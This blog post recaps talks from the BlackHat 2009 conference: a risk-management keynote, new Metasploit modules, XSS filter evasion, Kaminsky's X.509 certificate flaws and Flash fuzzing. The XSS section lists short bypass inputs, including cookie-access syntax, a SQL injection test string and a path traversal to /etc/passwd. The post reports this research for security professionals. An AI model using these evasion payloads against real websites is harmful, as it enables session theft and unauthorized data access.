Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

BlackHat 2009, Day 1

Tags: security

The annual Vegas Security conference is upon us again, and there have been plenty of interesting presentations. Last year, it felt like WiFi was the “theme” of the year — this year, the most interesting (and well-attended) briefings were on SSL and mobile devices.

The Wednesday keynote was presented by Douglas Merrill, the COO of EMI Records, formerly of Google, RAND Corporation, and several other places. He spoke on a popular topic for security conference keynotes — risk assessment and innovation. 80% of CEOs believe they’ve had a data breach, even though the statistics show that it’s basically impossible for the actual rate to be that high. And most of the breaches that do happen are trivial — looking at Privacy Watch’s statistics, 16% are lost laptops, 11% are paper that’s thrown away, etc. Actual hacker activity accounts for only a small percentage of the breaches — certainly not enough to justify what we spend on security. We constantly try as an industry to come up with “security ROI” metrics to show execs, but most of them are just nonsense; we make up numbers, then multiply them by numbers we also made up, and that’s how much you saved in the security breaches that didn’t happen but might have.

The #1 driver of security for CEOs is BCP (business continuity planning) — they just want to make sure things keep running no matter what. For security people, the #1 driver tends to be compliance — because it’s a stick with which we can make executives spend money even when they don’t want to. Due to the huge downside of a breach for us (since our job is preventing them, having one happen looks really bad), we overinvest in prevention.

Merrill’s point was that this overinvestment in security can stifle innovation, especially when perimeters (my favorite thing to hate, I know) are involved. People use consumer tools because the enterprise tools restrict them too much. Giving people control of their machines promotes innovation, and companies where people are free to innovate are more profitable — but giving people control makes endpoint security impossible, and reduces control by security and IT. We risk our jobs by doing the right thing for the company, and so we continue to do the “safe” thing even when it doesn’t make sense. Overall, it was a pretty good keynote — nothing revolutionary in it, but certainly food for thought for an audience of security professionals.

The second talk I attended to was three “mini-talks” about new Metasploit functionality, presented by Dino Dai Zovi, Mike Kershaw, and Chris Gates.

Dai Zovi adapted Meterpreter for the Mac. He created a Mach-O function resolver, and found one in the OS that wasn’t covered by the library randomization. His payload injects a remote execution loop, creates a bundle in RAM, then loads and executes it (neat trick, very hard to do in Windows but apparently easy on a Mac.) This can be used to load either Dai Zovi’s CocoaSequenceGrabber payload (which forces the webcam to take photos and send them to the hacker), or Macterpreter, a Meterpreter port by Charlie Miller. Pretty much all of Meterpreter works except process migration (processes owned by the same user can’t write to each other on Macs), so it should be good for all your Mac-hacking needs. He’s also added 4 exploits from the Mac Hacker’s Handbook to Metasploit.

Kershaw sought to adapt all the old shared-media attacks (i.e. what we did in the 80’s and 90’s on hub-based Ethernet) to WiFi. His LORCON2 library translates between 802.11 (WiFi) and 802.3 (Ethernet), so you can spoof ARP, DNS, even TCP connections. This gives you the airpwn attack in Metasploit — you can spoof, say, urchin.js or other common embedded JS files, give them a cache lifetime of a decade, and have someone’s browser calling home for a good long time even when they move off the unsafe network. Open and WEP networks literally can’t be secured against this, since you can spoof the AP to the client (so no AP-based defenses can be effective — the AP doesn’t even see the attack.) If you have the key, you can even do this on WPA-PSK (by forcing deauths and spoofing the AP.)

Gates essentially ported every Oracle attack of the last 10 years to Metasploit (all 11 of ’em.) Since Oracle charges for updates, there are tons of vulnerable servers out there (albeit not usually on the Internet.) There’s a TNS mixin, and an Oracle DB access plugin that executes queries via Oracle Instant Client (on Linux and Mac OS only, though Chris offered a reward to anyone who would port it to Windows this weekend.) It can grab the SID from the server on Oracle 9, or brute-force it on Oracle 10 (or sometimes grab it, depending on what Oracle modules are loaded.) All of these exploits were old, but they’re now really easy to perform.

David Lindsey and Eduardo Vela gave a talk on bypassing XSS filters. They weren’t looking at escaping/sanitizing functions, but rather HTTP IDS and other external anti-XSS measures.

They went through a long list of HTML tricks that can be done to evade these filters. Omitting whitespace, using / for spaces (did you know <img/src=”file.gif”alt=”text”> — no spaces — is treated as valid HTML by most browsers?), roundabout parameters (using separate<param> tags for everything even when you don’t have to), using data= rather than src= in tags that support it, embedding JavaScript in weird tags like <isindex>, prepending useless namespaces on tags (e.g. <x:script xmlns x=….>), using alternate syntax (why say “document.cookie” when “document[cookie]” or “with(document)alert(cookie)” will do), etc.

They even went into truly strange things, like using the ternary operator to make strings that were valid as both HTML and JavaScript but had different meanings in each, or using deprecated or broken syntaxes (which tends to be browser-specific.) Adding multiple parameters with the same name has undefined behavior, but works in some browsers. With Unicode, you can pad small (one-byte) characters out to extra bytes, which shouldn’t work but is accepted by some Unicode implementations (including Java and PHP.)

Perhaps most interestingly, filters could often be bypassed by ridiculous measures — such as using prompt() instead of alert() when testing for XSS, or using ‘ or ‘2’=’2′ instead of ‘ or ‘1’=’1′ to test for SQL injection, or /etc/x/../passwd instead of /etc/passwd. Some badly implemented filters just look for specific attacks, not general patterns.

Dan Kaminsky had managed to keep his talk secret this year, so we went into it knowing nothing but that it was “something about network security.” His talk was entitled “Black Ops of PKI,” and covered some vulnerabilities involving X.509 certificates (a theme I’ll revisit a lot when I do my DefCon writeup.) 60% of data breaches are not due to vulnerabilities, but just bad password handling — and PKI, based on X.509 certs, was supposed to fix all that. Of course, what’s actually been implemented is not really what most of us mean by PKI — the universal directory of distinguished names was never built — but certificates are everywhere now.

For those of you not familiar with them, X.509 certs are the basis of SSL/TLS and many other encrypted protocols. A certificate is supposed to indicate that the entity presenting it really is the entity named in the certificate. These are signed by various Certificate Authorities, which all themselves have certificates signed by other authorities, chaining all the way to the Root CAs, which have their certificates just built in to your browser & other software. As long as you trust the root CAs to validate other CAs, and trust those CAs to only sign legitimate certs, the system should work. But… that’s a lot of trust.

The problem is, X.509 can’t exclude — every CA can issue certs for every name. It’s too hard to interoperate with private CAs, so companies promise to behave and root CAs like VeriSign give them a signed intermediate certificate, allowing them to give out valid certs for anyone. What’s more, these certificates depend on various hashing algorithms for their security (since the hashes are what gets signed.) RapidSSL used MD5 for its signatures, and last year some security researchers took advantage of known issues in MD5 to create their own intermediate cert that was “signed” by RapidSSL’s signature. Luckily, that group had no intent to abuse the cert, so RapidSSL moved to a better hash and all was well.

Kaminsky discovered that one of VeriSign’s own certs is self-signed with MD2. There’s not even any good reason to self-sign a root cert, but they always do (because people — and programs — just expect a cert to be signed.) MD2, like MD5, has known vulnerabilities — it’s subject to a preimage attack that will eventually let someone create their own root cert that VeriSign’s self-signature works on. The complexity of this attack is outside our capabilities right now (273), but won’t be for much longer. This certificate was replaced by VeriSign (with one signed in SHA-1), but it will still probably be a long time before every client gets it off the list.

Much more interesting, though, were attacks on CAs themselves via PKCS#10 (the protocol by which you request a certificate to be issued to you.) When you request a certificate, you provide a “distinguished name”, part of which is the “common name” (domain name, in the case of SSL certs), as a specially-formatted string (it’s fixed-length, not null-terminated), in a binary package. Originally, requesting a cert was a manual process with lots of in-depth verification, but now it’s all automated. Kaminsky asked… what happens if you have multiple common names in one distinguished name? (Undefined; different CAs and clients do different things.) The identifier for common name is 2.5.4.3… what if you provide 2.5.4.03? Is that the same? The strange binary protocol means it may be, and 2.5.4.264+3 might be, too. What if there’s a null in the name? Since the protocol uses Pascal strings (length specified) rather than C strings (null-terminated), nulls in the name are valid, but practically every SSL client there is blows up at them.

And that was about it. Kaminsky ended with a recommendation that we embrace DNSSEC, so we can put certificate hashes in DNS. Unlike X.509, DNSSEC can exclude — we can ensure that only the authorized owner of a domain can provide its certificate, as well as make it possible for domains with EV certificates to exclude normal certificates for that domain. After what Dan presented the previous two years, this one seemed kind of disappointing — an MD2 cert and some parsing flaws in CAs? That’s it?

Actually, it turns out that these are devastating, and essentially render SSL unable to protect communications on untrusted networks (you know, precisely the places where you want SSL to protect you.) Smart hackers will be picking up wildcard certificates while they can, as CAs will be scrambling to fix this. As to why, I’ll explain that during my DefCon Day 1 writeup — Moxie Marlinspike and Mike Zusman presented research (apparently done at the same time as Kaminsky’s) that actually exploits this stuff.

The last presentation I went to on Day 1 was Riley Hassell‘s talk on “Exploiting Rich Content.” The description made this sound like it was about attacking web sites that use rich content (e.g. Flash, Java, Media Player, QuickTime, etc.), but it was actually about attacking the content engines themselves (e.g. making Flash malware), which, to me, is a much less interesting space. But then, my job is protecting web sites & services from attack, not being Adobe.

Hassell demonstrated how, using a fault injection fuzzer called FlashFire, he found 23 vulnerabilities in Flash on 785 codepaths, most of them being read-beyond-bounds issues. Normally those aren’t considered terribly serious, but since Flash runs in a browser, they can be. Essentially, it’s possible to write a Flash component on one web page that steals all the information in your browser’s memory space. If you have your bank’s website open in another tab, that could obviously be a bad thing. It’s quite the scalable bug, considering as Flash is installed on 99% of browsers, and the bug works on all platforms.

And that was it for Day 1. I went to an IOActive reception at Spago, met some interesting people (most of them from IOActive), and called it a night — most of the BlackHat nightlife seems to be on Day 2. I’ll update this post with links to the presentation decks and/or videos when they become available online (decks will probably be relatively soon, but BlackHat does not usually post videos until months after the conference since they are sold for a pretty hefty fee at first.)



This post first appeared on Perimeter Grid, please read the originial post: here

Share the post

BlackHat 2009, Day 1

×

Subscribe to Perimeter Grid

Get updates delivered right to your inbox!

Thank you for your subscription

×